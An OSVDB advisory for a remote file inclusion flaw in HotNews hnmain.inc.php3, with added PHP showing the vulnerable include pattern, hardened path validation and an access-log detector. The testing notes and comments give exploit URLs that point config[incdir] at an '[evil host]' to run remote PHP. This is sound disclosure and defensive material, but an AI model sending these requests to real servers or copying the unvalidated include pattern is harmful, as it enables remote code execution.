HotNews hnmain.inc.php3 Arbitrary Code Execution

2004-01-03T00:00:00
ID OSVDB:3405
Type osvdb
Reporter OSVDB
Modified 2004-01-03T00:00:00

Description

Vulnerability Description

HotNews contains a remote file inclusion flaw that allows an unauthenticated remote attacker to execute arbitrary PHP code on a vulnerable system. The hnmain.inc.php3 script builds the paths of the files it includes from the config[incdir] value, and that value can be supplied directly in the query string of a request (the classic register_globals pattern), so the script never sets it itself before use. A crafted request that points config[incdir] at a URL on an attacker-controlled host causes PHP to fetch the attacker's file and execute it with the privileges of the web server, resulting in a loss of confidentiality, integrity, and availability.
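The following is an added example and not HotNews' own code. The vulnerable function is a reconstruction of the pattern the advisory describes (an include path built from a request-controlled config[incdir]); the real script's variable names and directory layout are assumptions. The hardened functions beside it show the checks that close the hole: the include directory is fixed relative to the application root, URL-style values are rejected before any filesystem access, and only allow-listed file names are ever included. It uses PHP 7 syntax (type declarations, __DIR__), which is newer than the PHP 4 the original targeted.

```php
<?php
// Added example (not HotNews' own code). The vulnerable function is a
// reconstruction of the pattern the advisory describes; the real script's
// variable names and layout are assumptions.

// --- Vulnerable pattern: include path built from a request-controlled value.
// With register_globals=On, a request such as
//   includes/hnmain.inc.php3?config[incdir]=http://[evil host]/
// creates $config['incdir'] before this code runs, and with allow_url_fopen=On
// include() fetches http://[evil host]/func.inc.php3 and executes it.
function hotnews_include_vulnerable(array $config): void
{
    include $config['incdir'] . '/func.inc.php3';   // attacker-chosen base path
    include $config['incdir'] . '/hndefs.inc.php';  // same for the defs file
}

// --- Hardened pattern ---------------------------------------------------
// The application root is fixed at deploy time and never derived from the
// request. Assumed layout: <root>/includes/hnmain.inc.php3.
define('HOTNEWS_ROOT', realpath(__DIR__ . '/..'));

// Any stream-wrapper prefix (http://, ftp://, php://, data:) is not a local
// directory; refuse it before touching the filesystem at all.
function hotnews_is_url_like(string $path): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.\-]*:#i', $path);
}

// Canonicalise a candidate include directory and require that it resolves to
// an existing directory at or below HOTNEWS_ROOT. realpath() folds away "../",
// so traversal outside the root is caught by the prefix comparison.
function hotnews_validate_incdir(string $candidate): string
{
    if (hotnews_is_url_like($candidate)) {
        throw new InvalidArgumentException('incdir must be a local path, not a URL');
    }
    $dir  = realpath($candidate);
    $root = HOTNEWS_ROOT . DIRECTORY_SEPARATOR;
    if ($dir === false || !is_dir($dir)
        || strncmp($dir . DIRECTORY_SEPARATOR, $root, strlen($root)) !== 0) {
        throw new RuntimeException('incdir is not a directory under the application root');
    }
    return $dir;
}

// Only ever include files from a fixed allow-list, resolved inside the
// validated directory; neither the directory nor the name comes from the request.
function hotnews_include_hardened(string $incdir, string $name): void
{
    static $allowed = ['func.inc.php3' => true, 'hndefs.inc.php' => true];
    if (!isset($allowed[$name])) {
        throw new InvalidArgumentException("refusing to include $name");
    }
    $dir  = hotnews_validate_incdir($incdir);
    $file = realpath($dir . DIRECTORY_SEPARATOR . $name);
    if ($file === false || dirname($file) !== $dir) {
        throw new RuntimeException("$name not found directly under $dir");
    }
    require_once $file;
}

// Demonstration: the advisory's payload, a PHP stream wrapper and a traversal
// attempt are all refused before any I/O happens.
foreach (['http://[evil host]/', 'php://input', '../../etc'] as $bad) {
    try {
        hotnews_validate_incdir($bad);
        echo "ACCEPTED $bad (should not happen)\n";
    } catch (Exception $e) {
        echo "rejected $bad: " . $e->getMessage() . "\n";
    }
}
```

In a real include file the first line after `<?php` would also be a direct-access guard such as `if (!defined('HOTNEWS')) { exit; }`, where only the front-end script defines the constant; that is the in-code counterpart of the .htaccess workaround in the Solution Description.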

Solution Description

Currently, there are no known upgrades or patches to correct this issue; the HotNews project has been discontinued. The flaw can be mitigated with the following workaround(s): protect the "includes" directory with an .htaccess file or similar mechanism so that hnmain.inc.php3 cannot be requested directly. On the PHP side, turning register_globals off removes the ability to preset config[incdir] from the query string, and turning allow_url_fopen off (allow_url_include on PHP 5.2 and later) stops include() from fetching remote files at all; neither setting corrects the unvalidated include path itself, so the directory restriction should be applied regardless.

Short Description

HotNews contains a remote file inclusion flaw in hnmain.inc.php3: the config[incdir] parameter can be set in the request URL to point at a remote host, causing the script to include and execute attacker-supplied PHP code.

Manual Testing Notes

http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php
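For detection, the test requests above leave a distinctive trace in web-server access logs: a request to hnmain.inc.php3 whose config[incdir] value carries a URL scheme. The following is an added example, not part of the original advisory, that flags such lines; the log lines are constructed for the example (198.51.100.0/24 is a documentation range, not a real attacker), and decoding the query with parse_url()/parse_str() so that percent-encoded brackets and colons do not evade the check is the author's choice.

```php
<?php
// Added example: detection of the advisory's request pattern in access logs.
// Not part of the original advisory. Log lines are constructed, not real traffic.

// Return one entry per log line whose request targets hnmain.inc.php3 with a
// config[incdir] value that starts with a stream-wrapper scheme (http:, ftp:,
// php:, data:, ...). The query is parsed rather than pattern-matched so that
// config%5Bincdir%5D=http%3A%2F%2F... is caught as well as the plain form.
function hotnews_rfi_hits(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        // Pull the request target out of the common-log-format request field.
        if (!preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/#', $line, $m)) {
            continue;
        }
        $url = $m[1];
        if (stripos($url, 'hnmain.inc.php3') === false) {
            continue;
        }
        $query = parse_url($url, PHP_URL_QUERY);
        if (!is_string($query) || $query === '') {
            continue;
        }
        parse_str($query, $q);   // decodes and builds the config[incdir] array
        $config = $q['config'] ?? null;
        $incdir = is_array($config) ? ($config['incdir'] ?? null) : null;
        if (is_string($incdir) && preg_match('#^[a-z][a-z0-9+.\-]*:#i', $incdir)) {
            $hits[] = ['line' => $n + 1, 'incdir' => $incdir];
        }
    }
    return $hits;
}

// Constructed sample: two attack attempts (one percent-encoded), one benign
// request for the same script, and unrelated traffic.
$sample = [
    '198.51.100.7 - - [03/Jan/2004:10:00:01 +0000] "GET /includes/hnmain.inc.php3?config[incdir]=http://198.51.100.9/ HTTP/1.0" 200 512',
    '203.0.113.4 - - [03/Jan/2004:10:00:02 +0000] "GET /index.php3 HTTP/1.0" 200 2048',
    '198.51.100.7 - - [03/Jan/2004:10:00:03 +0000] "GET /includes/hnmain.inc.php3?config%5Bincdir%5D=ftp%3A%2F%2F198.51.100.9%2Fpub HTTP/1.0" 200 512',
    '203.0.113.4 - - [03/Jan/2004:10:00:04 +0000] "GET /includes/hnmain.inc.php3?config[incdir]=includes HTTP/1.0" 200 512',
];

foreach (hotnews_rfi_hits($sample) as $hit) {
    printf("line %d: remote include attempt, incdir=%s\n", $hit['line'], $hit['incdir']);
}
```

The fourth sample line is deliberately not flagged: a local value in config[incdir] is still an attempt to override the include path and is worth reviewing, but it is not the remote-inclusion pattern the advisory describes, and treating every occurrence of the parameter as an alert would be a separate, noisier rule.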

References:

Vendor URL: http://sourceforge.net/forum/forum.php?forum_id=342594
Secunia Advisory ID: 10551
Other Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2004-01/0021.html
Keyword: File Inclusion
ISS X-Force ID: 14140
Bugtraq ID: 9357